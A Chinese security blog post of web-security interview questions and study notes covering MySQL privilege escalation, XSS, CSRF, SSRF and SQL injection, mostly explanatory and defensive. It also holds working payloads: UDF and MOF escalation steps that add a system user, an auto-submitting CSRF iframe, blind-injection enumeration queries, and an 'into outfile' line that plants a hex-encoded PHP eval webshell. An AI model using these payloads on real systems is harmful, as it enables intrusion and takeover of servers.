<!DOCTYPE html>
<html lang="z">
<head>
    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    
    <title>web security interview | lc4t&#39;s blog</title>
    <meta name="renderer" content="webkit">
    <meta name="HandheldFriendly" content="True">
    <meta name="MobileOptimized" content="320">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <meta name="description" content="一些随想和笔记">

    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="web security interview | lc4t&#39;s blog">
    <meta name="twitter:description" content="一些随想和笔记">

    <meta property="og:type" content="article">
    <meta property="og:title" content="web security interview | lc4t&#39;s blog">
    <meta property="og:description" content="一些随想和笔记">

    
    <meta name="author" content="lc4t">
    
    
<link rel="stylesheet" href="/css/vno.css">

    
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css">


    
    <link rel="icon" href="/images/icon.png">
    

    <meta name="generator" content="hexo"/>
    
    <link rel="alternate" type="application/rss+xml" title="lc4t&#39;s blog" href="/atom.xml">
    

    <link rel="canonical" href="http://example.com/2017/03/06/web-security-interview/"/>

                 
</head>

<body class="home-template no-js">
    
<script src="//cdn.bootcss.com/jquery/2.1.4/jquery.min.js"></script>

    
<script src="/js/main.js"></script>

    <span class="mobile btn-mobile-menu">
        <i class="fa fa-list btn-mobile-menu__icon"></i>
        <i class="fa fa-angle-up btn-mobile-close__icon hidden"></i>
    </span>

    
<header class="panel-cover panel-cover--collapsed" style="background-image: url(/images/rem-pa.png)">
  <div class="panel-main">
    <div class="panel-main__inner panel-inverted">
    <div class="panel-main__content">

        <a href="/" title="前往 lc4t&#39;s blog 的主页"><img src="/images/avatar.jpg" width="80" alt="lc4t&#39;s blog logo" class="panel-cover__logo logo" /></a>
        <h1 class="panel-cover__title panel-title"><a href="/" title="link to homepage for lc4t&#39;s blog">lc4t&#39;s blog</a></h1>
        
        <hr class="panel-cover__divider" />
        <p class="panel-cover__description">一些随想和笔记</p>
        <hr class="panel-cover__divider panel-cover__divider--secondary" />

        <div class="navigation-wrapper">
          <div>
          <nav class="cover-navigation cover-navigation--primary">
            <ul class="navigation">
              <li class="navigation__item"><a href="/#blog" title="Visit the blog" class="blog-button">Blog</a></li>
            
              <li class="navigation__item"><a href="/friends">Friends</a></li>
            
              <li class="navigation__item"><a href="/tags">Tags</a></li>
            
              <li class="navigation__item"><a href="/about">About</a></li>
            
            </ul>
          </nav>
          </div>
          <div>
          <nav class="cover-navigation navigation--social">
  <ul class="navigation">

  <!-- Weibo-->
  

  <!-- Github -->
  
  <li class="navigation__item">
    <a href="https://github.com/lc4t" title="GitHub" target="_blank">
      <i class='social fa fa-github'></i>
      <span class="label">Github</span>
    </a>
  </li>


<!-- Stack Overflow -->
        

  <!-- Google Plus -->
  

<!-- Facebook -->

  
<!-- Twitter -->

  

  <li class="navigation__item">
    <a href="/atom.xml" title="RSS" target="_blank">
      <i class='social fa fa-rss'></i>
      <span class="label">RSS</span>
    </a>
  </li>



  </ul>
</nav>

          </div>
        </div>

      </div>

    </div>

    <div class="panel-cover--overlay cover-purple"></div>
  </div> 
</header>

    <div class="content-wrapper">
        <div class="content-wrapper__inner">
            <article class="post-container post-container--single">

  <header class="post-header">
    <div class="post-meta">
      <time datetime="2017-03-06T07:27:41.000Z" class="post-list__meta--date date">2017-03-06</time> &#8226; <span class="post-meta__tags tags">于 
  <a class="-none-link" href="/tags/interview/" rel="tag">interview</a>, <a class="-none-link" href="/tags/web-security/" rel="tag">web_security</a>
 </span>
      <span class="page-pv">
       Read <span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span>
      </span> 
   
    </div>
    <h1 class="post-title">web security interview</h1>
  </header>

  <section class="post">
    <h3 id="说明"><a href="#说明" class="headerlink" title="说明"></a>说明</h3><blockquote>
<p>下面的题目都是遇到的原题或引申出的题目，答案不保证正确，欢迎有问题告诉我，或者补充</p>
</blockquote>
<span id="more"></span>

<h3 id="开放题目"><a href="#开放题目" class="headerlink" title="开放题目"></a>开放题目</h3><h4 id="对Web安全的理解"><a href="#对Web安全的理解" class="headerlink" title="对Web安全的理解"></a>对Web安全的理解</h4><h4 id="熟悉的漏洞和防范手段"><a href="#熟悉的漏洞和防范手段" class="headerlink" title="熟悉的漏洞和防范手段"></a>熟悉的漏洞和防范手段</h4><h4 id="自己找到过的代码审计问题"><a href="#自己找到过的代码审计问题" class="headerlink" title="自己找到过的代码审计问题"></a>自己找到过的代码审计问题</h4><h4 id="平时用什么语言开发"><a href="#平时用什么语言开发" class="headerlink" title="平时用什么语言开发"></a>平时用什么语言开发</h4><h4 id="写过什么项目-什么功能-解决了什么难题"><a href="#写过什么项目-什么功能-解决了什么难题" class="headerlink" title="写过什么项目, 什么功能, 解决了什么难题"></a>写过什么项目, 什么功能, 解决了什么难题</h4><h4 id="用什么扫描器"><a href="#用什么扫描器" class="headerlink" title="用什么扫描器"></a>用什么扫描器</h4><h4 id="自我介绍"><a href="#自我介绍" class="headerlink" title="自我介绍"></a>自我介绍</h4><h4 id="学习了多久web安全-学了什么"><a href="#学习了多久web安全-学了什么" class="headerlink" title="学习了多久web安全 学了什么"></a>学习了多久web安全 学了什么</h4><h4 id="漏洞挖掘经验"><a href="#漏洞挖掘经验" class="headerlink" title="漏洞挖掘经验"></a>漏洞挖掘经验</h4><h4 id="漏洞深入研究经验"><a href="#漏洞深入研究经验" class="headerlink" title="漏洞深入研究经验"></a>漏洞深入研究经验</h4><h4 id="实习能来多久"><a href="#实习能来多久" class="headerlink" title="实习能来多久"></a>实习能来多久</h4><h4 id="实习的话想干什么"><a href="#实习的话想干什么" class="headerlink" title="实习的话想干什么"></a>实习的话想干什么</h4><h4 id="有什么没问到的方面"><a href="#有什么没问到的方面" class="headerlink" title="有什么没问到的方面"></a>有什么没问到的方面</h4><h4 id="实习做了什么，就此方面提问"><a href="#实习做了什么，就此方面提问" class="headerlink" title="实习做了什么，就此方面提问"></a>实习做了什么，就此方面提问</h4><h4 id="讲讲web安全经历"><a href="#讲讲web安全经历" class="headerlink" title="讲讲web安全经历"></a>讲讲web安全经历</h4><h4 id="考研吗？为什么"><a href="#考研吗？为什么" class="headerlink" title="考研吗？为什么"></a>考研吗？为什么</h4><!--more-->

<h3 id="MySQL提权"><a href="#MySQL提权" class="headerlink" title="MySQL提权"></a>MySQL提权</h3><h4 id="UDF提权，目录位置"><a href="#UDF提权，目录位置" class="headerlink" title="UDF提权，目录位置"></a>UDF提权，目录位置</h4><blockquote>
<p>root<br>func表<br>5.x</p>
</blockquote>
<ol>
<li>show variables like ‘%plugin%’;</li>
<li>plugin_dir: /usr/bin/mysql/plugin    (need rw)</li>
<li>uname -a</li>
<li>select hex(load_file(‘/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so’)) into outfile ‘/tmp/udf.txt’;</li>
<li>select unhex(‘7F454C46020…’) into dumpfile ‘/usr/lib/mysql/plugin/mysqludf.so’;</li>
<li>nm -D /usr/lib/mysql/plugin/mysqludf.so</li>
<li>create function sys_eval returns string soname “mysqludf.so”;</li>
<li>select sys_eval(‘whoami’);</li>
</ol>
<h4 id="mof提权，需要写目录上传权限"><a href="#mof提权，需要写目录上传权限" class="headerlink" title="mof提权，需要写目录上传权限"></a>mof提权，需要写目录上传权限</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">#pragma namespace(&quot;\\\\.\\root\\subscription&quot;)</span><br><span class="line"></span><br><span class="line">instance of __EventFilter as $EventFilter</span><br><span class="line">&#123;</span><br><span class="line">    EventNamespace &#x3D; &quot;Root\\Cimv2&quot;;</span><br><span class="line">    Name  &#x3D; &quot;filtP2&quot;;</span><br><span class="line">    Query &#x3D; &quot;Select * From __InstanceModificationEvent &quot;</span><br><span class="line">            &quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot;</span><br><span class="line">            &quot;And TargetInstance.Second &#x3D; 5&quot;;</span><br><span class="line">    QueryLanguage &#x3D; &quot;WQL&quot;;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">instance of ActiveScriptEventConsumer as $Consumer</span><br><span class="line">&#123;</span><br><span class="line">    Name &#x3D; &quot;consPCSV2&quot;;</span><br><span class="line">    ScriptingEngine &#x3D; &quot;JScript&quot;;</span><br><span class="line">    ScriptText &#x3D;</span><br><span class="line">    &quot;var WSH &#x3D; new ActiveXObject(\&quot;WScript.Shell\&quot;)\nWSH.run(\&quot;net.exe user [username] [password] &#x2F;add\&quot;)&quot;;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line">instance of __FilterToConsumerBinding</span><br><span class="line">&#123;</span><br><span class="line">    Consumer   &#x3D; $Consumer;</span><br><span class="line">    Filter &#x3D; $EventFilter;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> load_file(<span class="string">&#x27;C:/wmpub/nullevt.mof&#x27;</span>) <span class="keyword">into</span> dumpfile <span class="string">&#x27;c:/windows/system32/wbem/mof/nullevt.mof&#x27;</span></span><br></pre></td></tr></table></figure>
<hr>
<h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><h4 id="XSS一般问题"><a href="#XSS一般问题" class="headerlink" title="XSS一般问题"></a>XSS一般问题</h4><blockquote>
<p>反射型XSS：依赖用户行为触发</p>
</blockquote>
<p>Hacker——发现存在反射XSS的URL——根据输出点的环境构造XSS代码——进行编码、缩短(可有可无，是为了增加迷惑性)——发送给受害人——受害打开后，执行XSS代码——完成hacker想要的功能(获取cookies、url、浏览器信息、IP等等)</p>
<blockquote>
<p>存储型XSS：自动触发</p>
</blockquote>
<p>储蓄型XSS其实和反射型XSS差不多，只是储蓄型把数据保存到服务端，而反射型只是让XSS游走在客户端上。下面是我在某处网站上检测到的储蓄XSS</p>
<blockquote>
<p>DOMXSS：依赖用户行为，DOM发生变化, 也有反射存储</p>
</blockquote>
<p>DOM XSS是基于在js上的。而且他不需要与服务端进行交互，像反射、储蓄都需要服务端的反馈来构造xss，因为服务端对我们是不可见的</p>
<pre><code>4. flash XSS：
</code></pre>
<blockquote>
<p>对抗XSS</p>
</blockquote>
<pre><code>1. HTTP Only/ip绑定cookie
2. 过滤输入(filter,服务端，htmkentities,htmlspecialchars,)和输出(转义、编码)
3. 设置新的Cookie标志?
4. 设置一个HTTP标头?
5. (dom)输出到script时，做jsencode，document.write时，如果输出到事件或脚本，做jsencode，如果输出到html内容或属性，做htmlencode
</code></pre>
<blockquote>
<p>技巧</p>
</blockquote>
<pre><code>1. 字符编码绕过
2. 注释符打通
3. base标签
4. 存储嵌套一个反射型
</code></pre>
<blockquote>
<p>xss位置</p>
</blockquote>
<pre><code>1. HTML标签中，如&lt;script&gt;&lt;a&gt;
2. HTML属性中&lt;x src&gt;
3. 在存在的&lt;script&gt;中拼接
4. 事件中onclick,onerror
5. CSS中，@import, url(), expression
6. URL
7. 输出点document.write, document.writeln, xxx.innerHTML, xxx.outerHTML, innerHTML.replace, document.attachEvent, window.attachEvent, document.location.replace, document.location.assign
8. 输入点input,window.location(href,hash), window.name, document.referer, document.cookie, localstorage, XMLHttpRequest返回值
</code></pre>
<h4 id="XSS能用来干什么"><a href="#XSS能用来干什么" class="headerlink" title="XSS能用来干什么"></a>XSS能用来干什么</h4><pre><code>1. 获取cookie
2. GET/POST操作
3. 钓鱼（伪造一个登录框）
4. 获取浏览器（UA、插件）和系统信息（OS、控件）
5. css history hack
6. 结合其他环境（java）获取信息，例如ip
7. WORM:感染+传播
8. xss shell: 结合csrf
9. xss: 攻击客户端(js爆破缓存目录、下载、执行木马)
</code></pre>
<h4 id="DOM-XSS原理和防范"><a href="#DOM-XSS原理和防范" class="headerlink" title="DOM XSS原理和防范"></a>DOM XSS原理和防范</h4><pre><code>1. 输出到script时，做jsencode，document.write时，如果输出到事件或脚本，做jsencode，如果输出到html内容或属性，做htmlencode
</code></pre>
<h4 id="如何保证DOM不被修改，防止DOM-XSS"><a href="#如何保证DOM不被修改，防止DOM-XSS" class="headerlink" title="如何保证DOM不被修改，防止DOM XSS"></a>如何保证DOM不被修改，防止DOM XSS</h4><pre><code>1. document.createTextNode
2. 过滤输出数据
3. 在脚本中将不可信数据插入到HTML前，先执行HTML转义、然后执行JS转义
4. 在脚本中将不可信数据插入到HTML属性前，先执行JS转义
5. 将不可信数据插入到事件处理句柄 和 JS 代码中，一定要小心（setTimeout, setInterval, new Function）
6. 将不可信数据插入到CSS属性前先执行JS转义
7. 将不可信数据插入到URL属性前，先执行URL转义，后执行JS转义
</code></pre>
<h4 id="存储型XSS原理和防范"><a href="#存储型XSS原理和防范" class="headerlink" title="存储型XSS原理和防范"></a>存储型XSS原理和防范</h4><h4 id="XSS防御策略"><a href="#XSS防御策略" class="headerlink" title="XSS防御策略"></a>XSS防御策略</h4><pre><code>1. 不可信的数据应该做为只显示的文本，不应该作为 JS代码或者标签被执行
2. 对不可信数据总是采用JS转义，并添加引号的方法，让其出现在JS代码中
3. 避免使用HTML渲染方法
4. DOM中的URL转义需要注意字符集问题
5. HTML渲染HTML转义，后执行JS转义
6. eval() 不可信
7. innerText比较安全
</code></pre>
<h4 id="如何快速发现可能XSS的位置"><a href="#如何快速发现可能XSS的位置" class="headerlink" title="如何快速发现可能XSS的位置"></a>如何快速发现可能XSS的位置</h4><ol>
<li>测试输入点的特殊字符过滤</li>
<li>xssfuzz</li>
<li>HTTP Referer</li>
<li>User-Agent</li>
<li>Cookie</li>
<li>表单</li>
<li>URL参数</li>
<li>URL末尾</li>
<li>跳转型xss</li>
</ol>
<h4 id="XSS过滤放在输入还是输出好"><a href="#XSS过滤放在输入还是输出好" class="headerlink" title="XSS过滤放在输入还是输出好"></a>XSS过滤放在输入还是输出好</h4><ol>
<li>都要有，防止入库和防止生效</li>
</ol>
<h4 id="如何绕过HTTP-Only"><a href="#如何绕过HTTP-Only" class="headerlink" title="如何绕过HTTP Only"></a>如何绕过HTTP Only</h4><pre><code>1. 利用中间件报错、Apache报错等
</code></pre>
<h4 id="XSS-worm原理"><a href="#XSS-worm原理" class="headerlink" title="XSS worm原理"></a>XSS worm原理</h4><ol>
<li>Ajax</li>
<li>攻击者发现目标网站存在XSS漏洞，并且可以编写 XSS 蠕虫。</li>
<li>利用宿主 （如博客空间） 作为传播源头进行 XSS 攻击。</li>
<li>当其他用户访问被感染的空间时，XSS 蠕虫就继续感染。</li>
</ol>
<h4 id="XSS绕过同源策略，获取子站、另外网站的信息"><a href="#XSS绕过同源策略，获取子站、另外网站的信息" class="headerlink" title="XSS绕过同源策略，获取子站、另外网站的信息"></a>XSS绕过同源策略，获取子站、另外网站的信息</h4><ol>
<li>Java同源策略绕过，同IP</li>
<li>XXE Injection</li>
<li>Adobe Flash同源策略绕过：allow-access-from</li>
<li>Silverlight http=https</li>
<li>document.domain(跨子域)</li>
<li>JSONP</li>
<li>CORS</li>
<li>window.name跨域</li>
<li>window.postMessage跨域传送</li>
<li>crossdomain.xml</li>
<li>location.hash</li>
<li>WebSocket</li>
</ol>
<h3 id="Cookie"><a href="#Cookie" class="headerlink" title="Cookie"></a>Cookie</h3><h4 id="Cookie有哪些参数，Secure什么用"><a href="#Cookie有哪些参数，Secure什么用" class="headerlink" title="Cookie有哪些参数，Secure什么用"></a>Cookie有哪些参数，Secure什么用</h4><ol>
<li>secure： 仅在HTTPS使用</li>
<li>HTTP Only： 防止客户端(js)访问</li>
<li>SameSite=Lax(仅POST禁止)/Strict(GET也不允许跨域传送Cookie)</li>
</ol>
<h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><p>参数可以被攻击者预测</p>
<ol>
<li>用户C打开浏览器，访问受信任网站A，输入用户名和密码请求登录网站A；</li>
<li>在用户信息通过验证后，网站A产生Cookie信息并返回给浏览器，此时用户登录网站A成功，可以正常发送请求到网站A；</li>
<li>用户未退出网站A之前，在同一浏览器中，打开一个TAB页访问网站B；</li>
<li>网站B接收到用户请求后，返回一些攻击性代码，并发出一个请求要求访问第三方站点A；</li>
<li>浏览器在接收到这些攻击性代码后，根据网站B的请求，在用户不知情的情况下携带Cookie信息，向网站A发出请求。网站A并不知道该请求其实是由B发起的，所以会根据用户C的Cookie信息以C的权限处理该请求，导致来自网站B的恶意代码被执行。</li>
</ol>
<h4 id="CSRF-如何不带Referer访问-绕过Referer"><a href="#CSRF-如何不带Referer访问-绕过Referer" class="headerlink" title="CSRF 如何不带Referer访问,绕过Referer"></a>CSRF 如何不带Referer访问,绕过Referer</h4><ol>
<li>跨协议时referer为空,例如data://</li>
</ol>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"> <span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">&quot;data:text/html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg==&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line">base64为<span class="tag">&lt;<span class="name">form</span> <span class="attr">method</span>=<span class="string">post</span> <span class="attr">action</span>=<span class="string">http://a.b.com/d</span>&gt;</span><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">text</span> <span class="attr">name</span>=<span class="string">&#x27;id&#x27;</span> <span class="attr">value</span>=<span class="string">&#x27;123&#x27;</span>/&gt;</span><span class="tag">&lt;/<span class="name">form</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.forms[<span class="number">0</span>].submit();</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="CSRF防御"><a href="#CSRF防御" class="headerlink" title="CSRF防御"></a>CSRF防御</h4><p>(不完全解决)</p>
<pre><code>当用户关闭页面时，清除session；设置低时效session
(不能解决打开标签页后再打开伪造请求页造成的csrf)
</code></pre>
<p>(不完全解决)</p>
<pre><code>检查referer是否是本站
(不能解决跨协议空referer)
</code></pre>
<p>(不完全解决/简单)</p>
<pre><code>当表单提交时向form增加一个临时cookie字段
(此cookie在前端生成，因此会被破解)
</code></pre>
<p>(仅防止表单提交)</p>
<pre><code>参考django的csrf_token，保证请求来源于本页
(不能防止无表单获取/token)
</code></pre>
<p>(复杂)</p>
<pre><code>对每个敏感信息获取请求增加验证码
</code></pre>
<p>(防止JSON HiJacking)</p>
<pre><code>在json数据头部加入while(1)
</code></pre>
<p>(HTTP-Headers)</p>
<pre><code>在http头/协议层添加token验证
</code></pre>
<ol>
<li>token不能放在url中(被referer泄露);token必须随机;token一次性有效</li>
<li>referer不可能解决问题，因为必须保证空referer可以访问，否则无法直接访问主页，但是跨协议访问时会造成空referer</li>
<li>可以将安全认证和处理模块独立，做在外层</li>
<li>可以结合多个解决方案</li>
<li>在1.4.3中可以使用后端随机生成的cookie字段名</li>
<li>在1.4.6中，浏览器可以去掉json文件违规的while(1)，而对hacker可能会造成脚本卡死</li>
<li>服务端配置缺少Access-Control-Allow-Headers</li>
</ol>
<hr>
<h3 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h3><h4 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h4><p>很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL，web应用可以获取图片，下载文件，读取文件内容等。这个功能如果被恶意使用，可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击</p>
<p>如果应用程序对用户提供的URL和远端服务器返回的信息没有进行合适的验证和过滤，就可能存在这种服务端请求伪造的缺陷</p>
<h4 id="挖掘"><a href="#挖掘" class="headerlink" title="挖掘"></a>挖掘</h4><blockquote>
<p>从WEB功能上寻找</p>
</blockquote>
<ol>
<li>分享：通过URL地址分享网页内容</li>
<li>转码服务：通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览</li>
<li>在线翻译：通过URL地址翻译对应文本的内容。提供此功能的国内公司有百度、有道等</li>
<li>图片加载与下载：通过URL地址加载或下载图片</li>
<li>图片、文章收藏功能</li>
<li>未公开的api实现以及其他调用URL的功能</li>
</ol>
<blockquote>
<p>从URL关键字中寻找</p>
</blockquote>
<ol>
<li>share/wap/url/link/src/source/target/u/3g/display/sourceURl/imageURL/domain</li>
</ol>
<blockquote>
<p>SSRF 漏洞的验证</p>
</blockquote>
<ol>
<li>基本判断（排除法）(URL和看请求)</li>
<li>实例验证</li>
</ol>
<h4 id="SSRF-漏洞中URL地址过滤的绕过"><a href="#SSRF-漏洞中URL地址过滤的绕过" class="headerlink" title="SSRF 漏洞中URL地址过滤的绕过"></a>SSRF 漏洞中URL地址过滤的绕过</h4><ol>
<li><a target="_blank" rel="noopener" href="http://www.baidu.com@10.10.10.10与http//10.10.10.10">http://www.baidu.com@10.10.10.10与http://10.10.10.10</a> 请求是相同的</li>
<li>ip地址转换成进制来访问</li>
</ol>
<h4 id="利用方式"><a href="#利用方式" class="headerlink" title="利用方式"></a>利用方式</h4><ol>
<li><p>可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息</p>
</li>
<li><p>攻击运行在内网或本地的应用程序（比如溢出）</p>
</li>
<li><p>对内网web应用进行指纹识别，通过访问默认文件实现</p>
</li>
<li><p>攻击内外网的web应用，主要是使用get参数就可以实现的攻击（比如struts2，sqli等）</p>
</li>
<li><p>利用file协议读取本地文件等</p>
</li>
</ol>
<h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h3><h4 id="类型"><a href="#类型" class="headerlink" title="类型"></a>类型</h4><pre><code>1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。

2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。

3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。

4、联合查询注入，可以使用union的情况下的注入。

5、堆查询注入，可以同时执行多条语句的执行时的注入。
</code></pre>
<h4 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h4><p>所谓SQL注入，就是通过把SQL命令插入到Web 表单 提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句</p>
<p>①不当的类型处理；②不安全的 数据 库配置；③不合理的查询集处理；④不当的错误处理；⑤转义字符处理不合适；⑥多个提交处理不当</p>
<ol>
<li>用户输入</li>
<li>后端处理输入数据，构建sql语句</li>
<li>提交给DBMS执行sql代码</li>
<li>记录运行状态和结果，返回后端</li>
<li>后端判断</li>
<li>前端反馈</li>
</ol>
<h4 id="sqlmap为什么讲注入分类"><a href="#sqlmap为什么讲注入分类" class="headerlink" title="sqlmap为什么讲注入分类"></a>sqlmap为什么讲注入分类</h4><p>区别只给出有或无</p>
<h4 id="SQLI能用来干什么"><a href="#SQLI能用来干什么" class="headerlink" title="SQLI能用来干什么"></a>SQLI能用来干什么</h4><ol>
<li>绕过验证</li>
<li>写shell</li>
<li>dump数据</li>
<li>执行系统命令</li>
</ol>
<h4 id="SQLI思路，首先测试什么"><a href="#SQLI思路，首先测试什么" class="headerlink" title="SQLI思路，首先测试什么"></a>SQLI思路，首先测试什么</h4><pre><code>类型
过滤字符
waf

报错：单引号 注释(--, #, /*comment*/, /*!mysql*/, ), 除0, 类型错误
堆查询: 支持: asp/asp.net/php + mssql    php + postgreSQL
       不支持: php + mysql, asp/asp.net/php/java + access, java + oracle
IF:
    mysql: SELECT IF (1=1,&#39;true&#39;,&#39;false&#39;)
    mssql: IF (1=1) SELECT &#39;true&#39; ELSE SELECT &#39;false&#39;

16hex:
    SELECT CHAR(0x66)(S)
    SELECT 0x5045(M) (这不是一个整数，而会是一个16进制字符串）
    SELECT 0x50 + 0x45(M) (现在这是整数了)
</code></pre>
<h4 id="MySQL和SQLServer注入时的区别"><a href="#MySQL和SQLServer注入时的区别" class="headerlink" title="MySQL和SQLServer注入时的区别"></a>MySQL和SQLServer注入时的区别</h4><p>MSSQL基本表<code>master, msdb, mssqlweb, empdb, model</code></p>
<blockquote>
<p>库名</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> group_concat(<span class="keyword">distinct</span> table_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema<span class="operator">=</span>database()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> name <span class="keyword">from</span> master.dbo.sysdatabases <span class="keyword">where</span> dbid<span class="operator">=</span><span class="number">1</span> <span class="keyword">union</span> <span class="keyword">select</span> name <span class="keyword">from</span> yourdatabasename.dbo.sysobjects <span class="keyword">where</span> xtype<span class="operator">=</span><span class="type">char</span>(<span class="number">85</span>) <span class="keyword">and</span> name <span class="keyword">not</span> <span class="keyword">in</span> (<span class="keyword">select</span> top XX name <span class="keyword">from</span> yourdatabasename.dbo.sysobjects <span class="keyword">where</span> xtype<span class="operator">=</span><span class="type">char</span>(<span class="number">85</span>))<span class="comment">--</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>获得表段的总序号（与id不同）</p>
</blockquote>
<p><code>union select id from yourdatabasename.dbo.sysobjects where xtype=char(85) and name not in (select top XX name from yourdatabasename.dbo.sysobjects where xtype=char(85))-- </code></p>
<blockquote>
<p>根据表的序号一个个列出字段的名字</p>
</blockquote>
<p><code>union select name from yourdatabasename.dbo.syscolumns where ID=2073058421 and name not in (select top XX name from yourdatabasename.dbo.syscolumns where ID=2073058421 )-- </code></p>
<h4 id="PostgreSQL"><a href="#PostgreSQL" class="headerlink" title="PostgreSQL"></a>PostgreSQL</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">union select datname from pg_database order by 11    #猜字段</span><br><span class="line">and (select length(current_database())) between 0,30 　　　　　　#判断数据库长度</span><br><span class="line">and(select ascii(substr(current_database(),1,1))) between 0,64　　#判断数据库名的第１位是否是在０,64的ascii码之间。</span><br><span class="line">select relname from pg_stat_user_tables limit 1 offset n;</span><br><span class="line">and(select count(*) from pg_stat_user_tables) between 0,64　　#判断数据库表数</span><br><span class="line">and(select length(relname) from pg_stat_user_tables limit 1 offset 0) between 0,64　　#判断数据库表第一个表的长度</span><br><span class="line">and(select ascii(substr(relname,1,1)) from pg_stat_user_tables limit 1 offset 0) between 0,64　　#判断数据库第一张表的第一个字符</span><br></pre></td></tr></table></figure>

<h4 id="rand-0-2报错原理"><a href="#rand-0-2报错原理" class="headerlink" title="rand(0)*2报错原理"></a>rand(0)*2报错原理</h4><p><code>select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a</code></p>
<p><code>floor(rand(0)*2):011011011</code></p>
<p><code>插入相同值, 第二次计算不同: 保证在开始的查询结果中, 不能让虚表中存在0, 1键值</code></p>
<ol>
<li><p>首先建立了一个虚表</p>
</li>
<li><p>取第一条数据，执行floor(rand(0) * 2)，结果为0（<strong>第一次计算</strong>），查询虚表，发现键值0不存在，在进行一次计算，结果为1（<strong>第一次插入</strong>），插入到表中；</p>
</li>
<li><p>取出第二条数据，执行floor(rand(0) * 2)，结果为1（<strong>第二次计算</strong>），查询虚表，记录存在，直接count(*)加一；</p>
</li>
<li><p>取出第三条数据，执行floor(rand(0) * 2)，结果为0（<strong>第三次计算</strong>），查询虚表，发现不存在键值0，在进行一次计算，结果1(<strong>第二次插入</strong>)，插入到虚表中作为虚表的主键，与之前的1冲突，这时候就会报错了。</p>
</li>
</ol>
<h4 id="SQLI如何写shell"><a href="#SQLI如何写shell" class="headerlink" title="SQLI如何写shell"></a>SQLI如何写shell</h4><blockquote>
<p>MySQL</p>
</blockquote>
<pre><code>select 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e,2,3,4 from mysql.user into outfile &#39;/var/www/html/z.php&#39;;
</code></pre>
<ol>
<li>需要知道Web目录的绝对路径</li>
<li>需要mysql用户有file权限，file权限限制在MySQL服务器上读写文件。grant file on <em>.</em> to root@localhost</li>
